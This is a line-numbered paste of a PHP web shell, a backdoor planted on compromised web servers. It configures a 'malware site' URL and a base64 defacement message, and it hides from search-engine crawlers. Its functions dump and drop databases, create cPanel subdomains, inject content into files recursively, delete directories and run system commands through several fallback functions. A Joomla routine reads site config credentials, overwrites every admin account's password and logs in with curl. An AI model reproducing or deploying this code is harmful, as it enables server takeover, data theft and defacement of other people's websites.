· 10 years ago · Oct 25, 2015, 09:18 AM
1<?php
2
3// Set Username & Password
4$user = "1";
5$pass = "1";
6
7$malsite = "http://jolygoestobeinvester.ru/"; // Malware Site
8$ind = "UE9JNTBOIE9QM1I0N09SIFdBUyBIRVJF"; // "Deface Page" Base64 encoded "POI50N OP3R47OR WAS HERE !!!!!"
9$bgimage = 'http://www.graphixcreations.com/twitter-backgrounds/black-light-background.png'; // Background Image
10$my_shell_style = "orange"; // "phizo", "P0I50N", "404", "orange"
11@set_magic_quotes_runtime(0);
12@ini_set('error_log',NULL);
13@ini_set('log_errors',0);
14ob_start();
15error_reporting(0);
16@set_time_limit(0);
17@ini_set('max_execution_time',0);
18@ini_set('output_buffering',0);
19
20if(!empty($_SERVER['HTTP_USER_AGENT']))
21{
22 $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
23 if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
24 header('HTTP/1.0 404 Not Found');
25 exit; }
26}
27// Dump Database
28if($_GET["action"] == "dumpDB")
29{
30 $self=$_SERVER["PHP_SELF"];
31 if(isset($_COOKIE['dbserver']))
32 {
33 $date = date("Y-m-d");
34 $dbserver = $_COOKIE["dbserver"];
35 $dbuser = $_COOKIE["dbuser"];
36 $dbpass = $_COOKIE["dbpass"];
37 $dbname = $_GET['dbname'];
38 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
39
40 $file = "Dump-$dbname-$date";
41
42 $file="Dump-$dbname-$date.sql";
43 $fp = fopen($file,"w");
44
45 function write($data)
46 {
47 global $fp;
48
49 fwrite($fp,$data);
50
51 }
52 mysql_connect ($dbserver, $dbuser, $dbpass);
53 mysql_select_db($dbname);
54 $tables = mysql_query ("SHOW TABLES");
55 while ($i = mysql_fetch_array($tables))
56 {
57 $i = $i['Tables_in_'.$dbname];
58 $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
59 write($create['Create Table'].";");
60 $sql = mysql_query ("SELECT * FROM ".$i);
61 if (mysql_num_rows($sql)) {
62 while ($row = mysql_fetch_row($sql)) {
63 foreach ($row as $j => $k) {
64 $row[$j] = "'".mysql_escape_string($k)."'";
65 }
66 write("INSERT INTO $i VALUES(".implode(",", $row).");");
67 }
68 }
69 }
70
71 fclose ($fp);
72
73 header("Content-Disposition: attachment; filename=" . $file);
74 header("Content-Type: application/download");
75 header("Content-Length: " . filesize($file));
76 flush();
77
78 $fp = fopen($file, "r");
79 while (!feof($fp))
80 {
81 echo fread($fp, 65536);
82 flush();
83 }
84 fclose($fp);
85 }
86}
87$hs_dhanush = "<style type=\"text/css\">
88<!--
89
90body,td,th {
91 color: #FF0000;
92 font-size: 14px;
93}
94tr:hover.lines
95{
96background-color:#000000;}
97tr.lines
98{
99background-color:#0C0C0C;}
100div.fixedbox
101{
102 width:70%;
103 padding:8px;
104 background-color:#171717;
105 position:fixed;
106 left:15%;
107 top:120px;
108 box-shadow: 0px 0px 10px #000;
109 -moz-border-radius: 5px 5px 5px 5px;
110 -webkit-border-radius: 5px 5px 5px 5px;
111 border-radius: 5px 5px 5px 5px;
112}
113div.logindiv{
114background-color:#171717; }
115table.btmtbl{
116border-collapse:collapse;
117border-color:red;}
118td.btmtbl{
119border-color:red;}
120input.but {
121 background-color:#000000;
122 color:#FF0000;
123 border : 1px solid #1B1B1B;
124}
125a:link {
126 color: #00FF00;
127 text-decoration:none;
128 font-weight:500;
129}
130a:hover {
131 color:#00FF00;
132 text-decoration:underline;
133}
134font.txt
135{
136 color: #00FF00;
137 text-decoration:none;
138 font-size:14px;
139}
140font.om
141{
142 color: #00FF00;
143}
144/* Write Permission Font */
145font.wrtperm
146{
147 color:#00FF00;
148}
149/* Read Permission Font */
150font.readperm
151{
152 color:#FF0000;
153}
154/* No Permission Font */
155font.noperm
156{
157 color:#FFFFFF;
158}
159font.mainmenu
160{
161 color:#FF0000;
162 text-decoration:none;
163 font-size:14px;
164}
165a:visited {
166 color: #FF0000;
167}
168input.box
169{
170 background-color:#0C0C0C;
171 color: lime;
172 border : 1px solid #1B1B1B;
173 -moz-border-radius:6px;
174 width:400;
175 border-radius:6px;
176}
177input.sbox
178{
179 background-color:#0C0C0C;
180 color: lime;
181 border : 1px solid #1B1B1B;
182 -moz-border-radius:6px;
183 width:180;
184 border-radius:6px;
185}
186select.sbox
187{
188 background-color:#0C0C0C;
189 color: lime;
190 border : 1px solid #1B1B1B;
191 -moz-border-radius:6px;
192 width:180;
193 border-radius:6px;
194}
195select.box
196{
197 background-color:#0C0C0C;
198 color: lime;
199 border : 1px solid #1B1B1B;
200 -moz-border-radius:6px;
201 width:400;
202 border-radius:6px;
203}
204
205textarea.box
206{
207 border : 3px solid #111;
208 background-color:#161616;
209 color : lime;
210 margin-top: 10px;
211 -moz-border-radius:7px;
212 border-radius:7px;
213}
214body {
215 background-color:#000000;
216}
217.myphp table
218{
219 width:100%;
220 padding:18px 10px;
221 border : 1px solid #1B1B1B;
222}
223.myphp td
224{
225 background:#111111;
226 color:#00ff00;
227 padding:6px 8px;
228 border-bottom:1px solid #222222;
229 font-size:14px;
230}
231.myphp th, th
232{
233 background:#181818;
234
235}
236-->
237</style>";
238$hs_orange = "<style type=\"text/css\">
239<!--
240body {
241background-image:url($bgimage);
242background-color:#000000;
243background-repeat:no-repeat;
244background-attachment:fixed;
245}
246/* Shell Title Color*/
247span.headtitle
248{
249 color:#F90;
250 text-decoration:none;
251
252}
253/* Login Page div*/
254div.logindiv
255{
256background-color:#000000;
257opacity:0.5;
258width:50%;
259border-radius:7px;
260margin-top:150px;
261-moz-border-radius:25px;
262height:410px;
263border: solid 1px
264#878787;
265border-radius: 13px;
266box-shadow: 0px 0px 10px
267black;
268}
269div.fixedbox
270{
271 width:70%;
272 padding:8px;
273 background-color:#171717;
274 position:fixed;
275 left:15%;
276 top:120px;
277 box-shadow: 0px 0px 35px #000;
278 -moz-border-radius: 5px 5px 5px 5px;
279 -webkit-border-radius: 5px 5px 5px 5px;
280 border-radius: 5px 5px 5px 5px;
281}
282table.tbl
283{
284border:#F90;
285}
286body,td,th {
287 color: #F90;
288 font-size: 14px;
289}
290table.btmtbl{
291border-collapse:collapse;
292border-color:#F90;}
293td.btmtbl{
294border-color:#F90;}
295/* Present Working Directory Table */
296table.pwdtbl
297{
298 border-color:#F90;
299}
300/* File List Hover */
301tr.lines:hover
302{
303background-color:#666666;
304opacity:0.5;
305}
306/* File List */
307tr.lines
308{
309 height:12px;
310}
311/* Functions Config */
312td.myfun
313{
314 display: inline;
315 padding: 1px;
316 margin: 5px;
317 border: 1px solid #AAA;
318 border-radius: 4px;
319 -moz-border-radius:4px;
320 box-shadow: 0px 0px 2px #000;
321}
322/* Functions Config Hover */
323td.myfun:hover
324{
325 box-shadow: 0px 0px 2px #FF0;
326}
327/* Button Config */
328input.but {
329 border: 1px solid #F90;
330 background-color:#000000;
331 color:#FFFFFF;
332
333 box-shadow: 0px 0px 2px #F90 inset;
334}
335/* Link Config */
336a:link {
337 color: #F90;
338 text-decoration:none;
339 font-weight:500;
340}
341/* Link Config Hover */
342a:hover {
343 color:#666666;
344 text-decoration:underline;
345}
346/* Link Config Visited */
347a:visited {
348 color: #F90;
349 text-decoration:none;
350}
351/* font Config */
352font.txt
353{
354 color: #FFFFFF;
355 text-decoration:none;
356 font-size:13px;
357}
358font.om
359{
360 color: #F90;
361}
362/* Function Font Config */
363font.fun
364{
365 color:#F90;
366}
367/* Write Permission Font */
368font.wrtperm
369{
370 color:#F90;
371}
372/* Read Permission Font */
373font.readperm
374{
375 color:#FF0000;
376}
377/* No Permission Font */
378font.noperm
379{
380 color:#FFFFFF;
381}
382/* Upload File Config */
383input.upld
384{
385 width:400;
386 margin:0;color:#FFFFFF;background-color:#000;border:1px solid #F90; font: 9pt Monospace,\"Courier New\";
387}
388/* Input TextBox Config */
389input.box
390{
391 width:400;
392 margin:0;color:#FFFFFF;background-color:#000;border:1px solid #F90; font: 9pt Monospace,\"Courier New\";
393}
394/* Input Small TextBox Config */
395input.sbox
396{
397 width:180;
398 margin:0;color:#FFFFFF;background-color:#000;border:1px solid #F90; font: 9pt Monospace,\"Courier New\";
399}
400/* Input Small SelectBox Config */
401select.sbox
402{
403 width:180;
404 margin:0;color:#FFFFFF;background-color:#000;border:1px solid #F90; font: 9pt Monospace,\"Courier New\";
405}
406/* Input SelectBox Config */
407select.box
408{
409 width:400;
410 margin:0;color:#FFFFFF;background-color:#000;border:1px solid #F90; font: 9pt Monospace,\"Courier New\";
411}
412/* TextArea Config */
413textarea.box
414{
415 border: 1px solid #F90;
416 color:#FFFFFF;
417 margin-top: 10px;
418 box-shadow: 0px 0px 3px #F90 inset;
419 background-color: #000000;
420 opacity: 0.50;
421}
422.myphp table
423{
424 width:100%;
425 padding:18px 10px;
426 border: 1px solid #F90;
427}
428.myphp td
429{
430 padding:6px 8px;
431 border-bottom:1px solid #222222;
432 font-size:14x;
433}
434
435-->
436</style>";
437$hs_404 = "<style type=\"text/css\">
438<!--
439span.headtitle
440{
441 color:#00ff00;
442 text-decoration:none;
443
444}
445body, th{
446 color:#00ff00;
447 background-color:#000000;
448 font-size: 13px;
449}
450div.logindiv{
451background-color:#171717; }
452div.fixedbox
453{
454 width:70%;
455 padding:8px;
456 background-color:#171717;
457 position:fixed;
458 left:15%;
459 top:120px;
460 box-shadow: 0px 0px 35px #000;
461 -moz-border-radius: 5px 5px 5px 5px;
462 -webkit-border-radius: 5px 5px 5px 5px;
463 border-radius: 5px 5px 5px 5px;
464}
465table.tbl
466{
467border:#00ff00;
468}
469table.btmtbl{
470border-collapse:collapse;
471border-color:lime;}
472td.btmtbl{
473border-color:lime;}
474tr.lines:hover
475{
476 background-color:#5e5e5e;
477}
478tr.lines
479{
480 background-color:#000000;
481 height:12px;
482 font-size: 14px;
483}
484td.myfun
485{
486 border-style:none;
487 margin: 5px;
488}
489td.myfun:hover
490{
491 box-shadow: 0px 0px 2px #FF0;
492}
493input.but {
494 margin:0;color:#00ff00;background-color:#000;border:1px solid #00ff00; font: 9pt Monospace,\"Courier New\";
495}
496a:link {
497 color: #00ff00;
498 text-decoration:none;
499 font-weight:500;
500}
501a:visited
502{
503color:#00ff00;
504}
505a:hover {
506 background:#ff0000;
507}
508font.mainmenu
509{
510 font-size:14px;
511}
512font.txt
513{
514 color: #FFFFFF;
515 text-decoration:none;
516 font-size:13px;
517}
518font.om
519{
520 color:#00FF00;
521}
522font.fun
523{
524
525 color:#00ff00;
526}
527font.wrtperm
528{
529 color:#00ff00;
530}
531font.readperm
532{
533 color:#FF0000;
534}
535font.noperm
536{
537 color:#FFFFFF;
538}
539input.upld
540{
541 width:400;
542 margin:0;color:#00ff00;background-color:#000;border:1px solid #00ff00; font: 9pt Monospace,\"Courier New\";
543}
544input.box
545{
546 width:400;
547 margin:0;color:#00ff00;background-color:#000;border:1px solid #00ff00; font: 9pt Monospace,\"Courier New\";
548}
549input.sbox
550{
551 width:180;
552 margin:0;color:#00ff00;background-color:#000;border:1px solid #00ff00; font: 9pt Monospace,\"Courier New\";
553}
554select.sbox
555{
556 width:180;
557 margin:0;color:#00ff00;background-color:#000;border:1px solid #00ff00; font: 9pt Monospace,\"Courier New\";
558}
559select.box
560{
561 width:400;
562 margin:0;color:#00ff00;background-color:#000;border:1px solid #00ff00; font: 9pt Monospace,\"Courier New\";
563}
564
565textarea.box
566{
567 margin:0;color:#00ff00;background-color:#000;border:1px solid #00ff00; font: 9pt Monospace,\"Courier New\";
568}
569.myphp table
570{
571 width:100%;
572 padding:18px 10px;
573 border : 1px solid #00FF00;
574}
575.myphp td
576{
577 background:#111111;
578 color:#00ff00;
579 padding:6px 8px;
580 border-bottom:1px solid #222222;
581 font-size:13px;
582}
583.myphp th,
584{
585 background:#181818;
586
587}
588-->
589</style>";
590$hs_phizo = "<style type=\"text/css\">
591<!--
592span.headtitle
593{
594 color:#000000;
595 text-decoration:none;
596
597}
598div.logindiv
599{
600background-color:#CCC;
601width:50%;
602border-radius:7px;
603margin-top:150px;
604-moz-border-radius:25px;
605height:410px;
606border: solid 1px
607#878787;
608border-radius: 13px;
609box-shadow: 0px 0px 10px
610black;
611}
612div.fixedbox
613{
614 width:70%;
615 padding:8px;
616 background-color:#999999;
617 position:fixed;
618 left:15%;
619 top:120px;
620 box-shadow: 0px 0px 10px #000;
621 -moz-border-radius: 5px 5px 5px 5px;
622 -webkit-border-radius: 5px 5px 5px 5px;
623 border-radius: 5px 5px 5px 5px;
624}
625body,td,th {
626 color: #000000;
627 font-size: 14px;
628}
629table.pwdtbl
630{
631 width:95%;
632 background-color:#999999;
633 -moz-border-radius:25px;
634 border-radius:25px;
635}
636table#maintable
637{
638 background-color: #999999;
639 border: solid 1px #878787;
640 border-radius: 13px;
641 box-shadow: 0px 0px 10px #000;
642 width: 100%;
643 margin: auto;
644 height: auto;
645}
646tr.lines:hover
647{
648background-color:#C0C0C0;
649}
650tr.lines
651{
652 background-color:#999999;
653 height:12px;
654}
655td.myfun
656{
657 display: inline;
658 padding: 1px;
659 margin: 5px;
660 border: 1px solid #AAA;
661 border-radius: 4px;
662 -moz-border-radius:4px;
663 box-shadow: 0px 0px 2px #000;
664}
665td.myfun:hover
666{
667 box-shadow: 0px 0px 2px #FF0;
668}
669input.but {
670 border: 1px solid #787878;
671 border-radius: 5px;
672 box-shadow: 0px 0px 2px #000 inset;
673}
674a:link,a:visited {
675 color: #000000;
676 text-decoration:none;
677 font-weight:500;
678}
679a:hover {
680 color:#666666;
681 text-decoration:underline;
682}
683font.mainmenu
684{
685 display: inline;
686 padding: 1px;
687 border: 1px solid #AAA;
688 border-radius: 4px;
689 box-shadow: 0px 0px 2px #000;
690 text-decoration: none;
691 font-weight: bold;
692 color: #696969;
693}
694font.txt
695{
696 color: #000000;
697 text-decoration:none;
698 font-size:13px;
699}
700font.om
701{
702 color:#000000;
703}
704font.fun
705{
706 color: #696969;
707}
708font.wrtperm
709{
710 color:#000000;
711}
712font.readperm
713{
714 color:#000000;
715}
716font.noperm
717{
718 color:#000000;
719}
720input.upld
721{
722 border: 1px solid #787878;
723 box-shadow: 0px 0px 3px #000 inset;
724 background-color: #AAA;
725 font-family: Courier;
726 -moz-border-radius:6px;
727 width:400;
728 border-radius:6px;
729}
730input.box
731{
732 border: 1px solid #787878;
733 box-shadow: 0px 0px 3px #000 inset;
734 background-color: #AAA;
735 font-family: Courier;
736 -moz-border-radius:6px;
737 width:400;
738 border-radius:6px;
739}
740input.sbox
741{
742 border: 1px solid #787878;
743 box-shadow: 0px 0px 3px #000 inset;
744 background-color: #AAA;
745 font-family: Courier;
746 -moz-border-radius:6px;
747 width:180;
748 border-radius:6px;
749}
750select.sbox
751{
752 border: 1px solid #787878;
753 box-shadow: 0px 0px 3px #000 inset;
754 background-color: #AAA;
755 font-family: Courier;
756 -moz-border-radius:6px;
757 width:180;
758 border-radius:6px;
759}
760select.box
761{
762 border: 1px solid #787878;
763 box-shadow: 0px 0px 3px #000 inset;
764 background-color: #AAA;
765 font-family: Courier;
766 -moz-border-radius:6px;
767 width:400;
768 border-radius:6px;
769}
770
771textarea.box
772{
773 border: 1px solid #787878;
774 margin-top: 10px;
775 -moz-border-radius:7px;
776 box-shadow: 0px 0px 3px #000 inset;
777 background-color: #AAA;
778}
779textarea:focus
780{
781 box-shadow: 0px 0px 3px #FF0 inset;
782}
783body {
784 background-color:#C0C0C0;
785}
786.myphp table
787{
788 width:100%;
789 padding:18px 10px;
790 border : 1px solid #1B1B1B;
791}
792.myphp td
793{
794 /*background:#111111; */
795 color:#000000;
796 padding:6px 8px;
797 border-bottom:1px solid #222222;
798 font-size:14px;
799}
800.myphp th, th
801{
802 background:#999999;
803
804}
805-->
806</style>";
807
808 if($_COOKIE['style']=='dhanush')
809 $shellstyle = $hs_dhanush;
810 elseif($_COOKIE['style']=='404')
811 $shellstyle = $hs_404;
812 elseif($_COOKIE['style']=='orange')
813 $shellstyle = $hs_orange;
814 elseif($_COOKIE['style']=='phizo')
815 $shellstyle = $hs_phizo;
816 else
817 {
818 if($my_shell_style == "phizo")
819 $shellstyle = $hs_phizo;
820 elseif($my_shell_style=='dhanush')
821 $shellstyle = $hs_dhanush;
822 elseif($my_shell_style=='404')
823 $shellstyle = $hs_404;
824 elseif($my_shell_style=='orange')
825 $shellstyle = $hs_orange;
826 }
827if(isset($_COOKIE['hacked']) && $_COOKIE['hacked']==md5($pass))
828{
829 $self=$_SERVER["PHP_SELF"];
830 $os = "N/D";
831 $bdmessage = null;
832 $dir = getcwd();
833
834 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
835 $path=explode('/',$url);
836 $curr_url =str_replace($path[count($path)-1],'',$url);
837
838 if(strtolower(substr(PHP_OS,0,3)) == "win")
839 {
840 $SEPARATOR = '\\';
841 $os = "Windows";
842 $directorysperator="\\";
843 }
844 else
845 {
846 $os = "Linux";
847 $directorysperator='/';
848 }
849 function Trail($d,$directsperator)
850 {
851 $d=explode($directsperator,$d);
852 array_pop($d);
853 array_pop($d);
854 $str=implode($d,$directsperator);
855 return $str;
856 }
857
858 function randomt()
859 {
860 $chars = "abcdefghijkmnopqrstuvwxyz023456789";
861 srand((double)microtime()*1000000);
862 $i = 0;
863 $pass = '' ;
864
865 while ($i <= 7)
866 {
867 $num = rand() % 33;
868 $tmp = substr($chars, $num, 1);
869 $pass = $pass . $tmp;
870 $i++;
871 }
872 return $pass;
873 }
874 function make_subdomain($subDomain,$cPanelUser,$cPanelPass,$subindex)
875 {
876 $rootDomain = $_SERVER['SERVER_NAME'];
877 $buildRequest = "/frontend/x3/subdomain/doadddomain.html?rootdomain=" . $rootDomain . "&domain=" . $subDomain . "&dir=public_html/" . $subDomain;
878
879 $openSocket = fsockopen('localhost',2082);
880 if(!$openSocket) {
881 return "Socket error<BR>";
882 }
883
884 $authString = $cPanelUser . ":" . $cPanelPass;
885 $authPass = base64_encode($authString);
886 $buildHeaders = "GET " . $buildRequest ."\r\n";
887 $buildHeaders .= "HTTP/1.0\r\n";
888 $buildHeaders .= "Host:localhost\r\n";
889 $buildHeaders .= "Authorization: Basic " . $authPass . "\r\n";
890 $buildHeaders .= "\r\n";
891
892 fputs($openSocket, $buildHeaders);
893 while(!feof($openSocket)) {
894 fgets($openSocket,128);
895 }
896 fclose($openSocket);
897 // create index file
898 @chdir($subDomain);
899 $file5 = fopen("index.html","w");
900 fputs($file5,$subindex);
901 fclose($file5);
902 $newDomain = "http://" . $subDomain . "." . $rootDomain . "/<BR>";
903
904 return $newDomain;
905}
906
907 // Database functions
908 function listdatabase()
909 {
910 $self=$_SERVER["PHP_SELF"];
911 ?>
912 <br>
913 <form>
914 <table>
915 <tr>
916 <td><input type="text" class="box" name="dbname"></td>
917 <td><input type="button" onClick="viewtables('createDB',dbname.value)" value=" Create Database " class="but"></td>
918 </tr>
919 </table>
920 </form>
921 <br>
922 <?php
923 $mysqlHandle = mysql_connect ($_COOKIE['dbserver'], $_COOKIE['dbuser'], $_COOKIE['dbpass']);
924 $result = mysql_query("SHOW DATABASE");
925 echo "<table class=btmtbl cellspacing=1 cellpadding=5 border=1 style=width:60%;>\n";
926
927 $pDB = mysql_list_dbs( $mysqlHandle );
928 $num = mysql_num_rows( $pDB );
929 for( $i = 0; $i < $num; $i++ )
930 {
931 $dbname = mysql_dbname( $pDB, $i );
932 mysql_select_db($dbname,$mysqlHandle);
933 $result = mysql_query("SHOW TABLES");
934 $num_of_tables = mysql_num_rows($result);
935 echo "<tr>\n";
936 echo "<td><a href=# onClick=\"viewtables('listTables','$dbname')\"><font size=3>$dbname</font></a> ($num_of_tables)</td>\n";
937 echo "<td><a href=# onClick=\"viewtables('listTables','$dbname')\">Tables</a></td>\n";
938 echo "<td><a href=# onClick=\"viewtables('dropDB','$dbname')\">Drop</a></td>\n";
939 echo "<td><a href='$self?action=dumpDB&dbname=$dbname' onClick=\"return confirm('Dump Database \'$dbname\'?')\">Dump</a></td>\n";
940 echo "</tr>\n";
941 }
942 echo "</table>\n";
943 mysql_close($mysqlHandle);
944 }
945
946 function listtable()
947 {
948 $self=$_SERVER["PHP_SELF"];
949 $dbserver = $_COOKIE["dbserver"];
950 $dbuser = $_COOKIE["dbuser"];
951 $dbpass = $_COOKIE["dbpass"];
952 $dbname = $_GET['dbname'];
953 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
954 ?>
955 <br><br>
956 <form>
957 <table>
958
959 <tr>
960 <td><input type="text" class="box" name="tablename"></td>
961 <td><input type="button" onClick="viewtables('createtable','<?php echo $_GET['dbname'];?>')" value=" Create Table " name="createmydb" class="but"></td>
962 </tr>
963 </table>
964
965 <br>
966 <form>
967 <table>
968 <tr>
969 <td><textarea cols="60" rows="7" name="executemyquery" class="box">Execute Query..</textarea></td>
970 </tr>
971 <tr>
972 <td><input type="button" onClick="viewtables('executequery','<?php echo $_GET['dbname'];?>','<?php echo $_GET['tablename']; ?>','','',executemyquery.value)" value="Execute" class="but"></td>
973 </tr>
974 </table>
975 </form>
976
977 <?php
978
979 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
980
981 mysql_select_db($dbname);
982 $pTable = mysql_list_tables( $dbname );
983
984 if( $pTable == 0 ) {
985 $msg = mysql_error();
986 echo "<h3>Error : $msg</h3><p>\n";
987 return;
988 }
989 $num = mysql_num_rows( $pTable );
990
991 echo "<table class=btmtbl cellspacing=1 cellpadding=5 border=1 style=width:60%;>\n";
992
993 for( $i = 0; $i < $num; $i++ )
994 {
995 $tablename = mysql_tablename( $pTable, $i );
996 $result = mysql_query("select * from $tablename");
997 $num_rows = mysql_num_rows($result);
998 echo "<tr>\n";
999 echo "<td>\n";
1000 echo "<a href=# onClick=\"viewtables('viewdata','$dbname','$tablename')\"><font size=3>$tablename</font></a> ($num_rows)\n";
1001 echo "</td>\n";
1002 echo "<td>\n";
1003 echo "<a href=# onClick=\"viewtables('viewSchema','$dbname','$tablename')\">Schema</a>\n";
1004 echo "</td>\n";
1005 echo "<td>\n";
1006 echo "<a href=# onClick=\"viewtables('viewdata','$dbname','$tablename')\">Data</a>\n";
1007 echo "</td>\n";
1008 echo "<td>\n";
1009 echo "<a href=# onClick=\"viewtables('empty','$dbname','$tablename')\">Empty</a>\n";
1010 echo "</td>\n";
1011 echo "<td>\n";
1012 echo "<a href=# onClick=\"viewtables('dropTable','$dbname','$tablename')\">Drop</a>\n";
1013 echo "</td>\n";
1014 echo "</tr>\n";
1015 }
1016
1017 echo "</table></form>";
1018 mysql_close($mysqlHandle);
1019 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
1020 }
1021
1022
1023 function paramexe($n, $v)
1024 {
1025 $v = trim($v);
1026 if($v)
1027 {
1028 echo '<span><font size=3>' . $n . ': </font></span>';
1029 if(strpos($v, "\n") === false)
1030 echo '<font size=2>' . $v . '</font><br>';
1031 else
1032 echo '<pre class=ml1><font class=txt size=3>' . $v . '</font></pre>';
1033 }
1034 }
1035 function injectdir($dir,$filetype,$mode,$lolinject)
1036 {
1037 if (is_dir($dir))
1038 {
1039 $objects = scandir($dir);
1040 foreach ($objects as $object)
1041 {
1042 if ($object != '.' && $object != '..')
1043 {
1044 if (is_dir($dir . '/' . $object))
1045 {
1046 // if we find a directory, do a recursive call
1047 injectdir($dir . '/' . $object,$filetype,$mode,$lolinject);
1048 }
1049 else
1050 {
1051 $file_parts = pathinfo($object);
1052 if($file_parts['extension'] == $filetype)
1053 {
1054 if(($dir . '/' . $object) == getcwd().$_SERVER['SCRIPT_NAME'])
1055 continue;
1056 $fp=fopen($dir . '/' . $object,$mode);
1057 if (fputs($fp,$lolinject))
1058 echo '<br><font class=txt >'.$dir . '/' . $object.' was injected<br></font>';
1059 else
1060 echo '<font >failed to inject '.$dir . '/' . $object.'<BR></font>';
1061 }
1062 }
1063 }
1064 }
1065 }
1066 }
1067 function rrmdir($dir)
1068 {
1069 if (is_dir($dir)) // ensures that we actually have a directory
1070 {
1071 $objects = scandir($dir); // gets all files and folders inside
1072 foreach ($objects as $object)
1073 {
1074 if ($object != '.' && $object != '..')
1075 {
1076 if (is_dir($dir . '/' . $object))
1077 {
1078 // if we find a directory, do a recursive call
1079 rrmdir($dir . '/' . $object);
1080 }
1081 else
1082 {
1083 // if we find a file, simply delete it
1084 unlink($dir . '/' . $object);
1085 }
1086 }
1087 }
1088 // the original directory is now empty, so delete it
1089 rmdir($dir);
1090 }
1091 }
1092
1093 function which($pr)
1094 {
1095 $path = execmd("which $pr");
1096 if(!empty($path))
1097 return trim($path);
1098 else
1099 return trim($pr);
1100 }
1101
1102 function magicboom($text)
1103 {
1104 if (!get_magic_quotes_gpc())
1105 return $text;
1106 return stripslashes($text);
1107 }
1108 function perlshell($command)
1109 {
1110 $perl=new perl();
1111 ob_start();
1112 $perl->eval("system('".$command."')");
1113 $exec=ob_get_contents();
1114 ob_end_clean();
1115 return $exec;
1116}
1117function execmd($cmd,$d_functions="None")
1118{
1119 if($d_functions=="None")
1120 {
1121 $ret=passthru($cmd);
1122 return $ret;
1123 }
1124 $funcs=array("shell_exec","exec","passthru","system","popen","perl_func");
1125 $d_functions=str_replace(" ","",$d_functions);
1126 $dis_funcs=explode(",",$d_functions);
1127 foreach($funcs as $safe)
1128 {
1129 if(!in_array($safe,$dis_funcs))
1130 {
1131 if($safe=="exec")
1132 {
1133 $ret=@exec($cmd);
1134 $ret=join("\n",$ret);
1135 return $ret;
1136 }
1137 elseif($safe=="system")
1138 {
1139 $ret=@system($cmd);
1140 return $ret;
1141 }
1142 elseif($safe=="passthru")
1143 {
1144 $ret=@passthru($cmd);
1145 return $ret;
1146 }
1147 elseif($safe=="shell_exec")
1148 {
1149 $ret=@shell_exec($cmd);
1150 return $ret;
1151 }
1152 elseif($safe=="popen")
1153 {
1154 $ret=@popen("$cmd",'r');
1155 if(is_resource($ret))
1156 {
1157 while(@!feof($ret))
1158 $read.=@fgets($ret);
1159 @pclose($ret);
1160 return $read;
1161 }
1162 return -1;
1163 }
1164 elseif($safe="proc_open")
1165 {
1166 $cmdpipe=array(
1167 0=>array('pipe','r'),
1168 1=>array('pipe','w')
1169 );
1170 $resource=@proc_open($cmd,$cmdpipe,$pipes);
1171 if(@is_resource($resource))
1172 {
1173 while(@!feof($pipes[1]))
1174 $ret.=@fgets($pipes[1]);
1175 @fclose($pipes[1]);
1176 @proc_close($resource);
1177 return $ret;
1178 }
1179 return -1;
1180 }
1181 elseif($safe=="perl_func")
1182 {
1183 $ret=perlshell($command);
1184 return $ret;
1185 }
1186 }
1187 }
1188 return -1;
1189}
1190 function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1)
1191 {
1192 $ar0=explode($marqueurDebutLien, $text);
1193 $ar1=explode($marqueurFinLien, $ar0[$i]);
1194 return trim($ar1[0]);
1195 }
1196 function changeindexjo($conf,$h,$site)
1197 {
1198 global $defcount;
1199 $dol = '$';
1200 $sitename = entre2v2($conf,$dol."sitename = '","';");
1201 $username = entre2v2($conf,$dol."user = '","';");
1202 $password = entre2v2($conf,$dol."password = '","';");
1203 $dbname = entre2v2($conf,$dol."db = '","';");
1204 $prefix = entre2v2($conf,$dol."dbprefix = '","';");
1205 $localhost = entre2v2($conf,$dol."host = '","';");
1206
1207 $co=randomt();
1208
1209 $link=mysql_connect($localhost,$username,$password) ;
1210 mysql_select_db($dbname,$link);
1211
1212 $tryChaningInfo = mysql_query("UPDATE ".$prefix."users SET username ='admin' , password = '2a9336f7666f9f474b7a8f67b48de527:DiWqRBR1thTQa2SvBsDqsUENrKOmZtAX'");
1213
1214 $req =mysql_query("SELECT * from `".$prefix."extensions` ");
1215
1216 if ( $req )
1217 {
1218 $req =mysql_query("SELECT * from `".$prefix."template_styles` WHERE client_id='0' and home='1'");
1219 $data = mysql_fetch_array($req);
1220 $template_name=$data["template"];
1221
1222 $req =mysql_query("SELECT * from `".$prefix."extensions` WHERE name='".$template_name."'");
1223 $data = mysql_fetch_array($req);
1224 $template_id=$data["extension_id"];
1225
1226 $url2 = $site_url =$site."/administrator/index.php";
1227
1228 $ch = curl_init();
1229 curl_setopt($ch, CURLOPT_URL, $url2);
1230 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1231 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1232 curl_setopt($ch, CURLOPT_HEADER, 1);
1233 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1234 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1235 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1236
1237 $buffer = curl_exec($ch);
1238
1239 $return=entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
1240 $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);
1241
1242 $url2=$site_url."/index.php";
1243 $ch = curl_init();
1244 curl_setopt($ch, CURLOPT_URL, $url2);
1245 curl_setopt($ch, CURLOPT_POST, 1);
1246 curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&return=".$return."&".$hidden."=1");
1247 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1248 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1249 curl_setopt($ch, CURLOPT_HEADER, 0);
1250 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
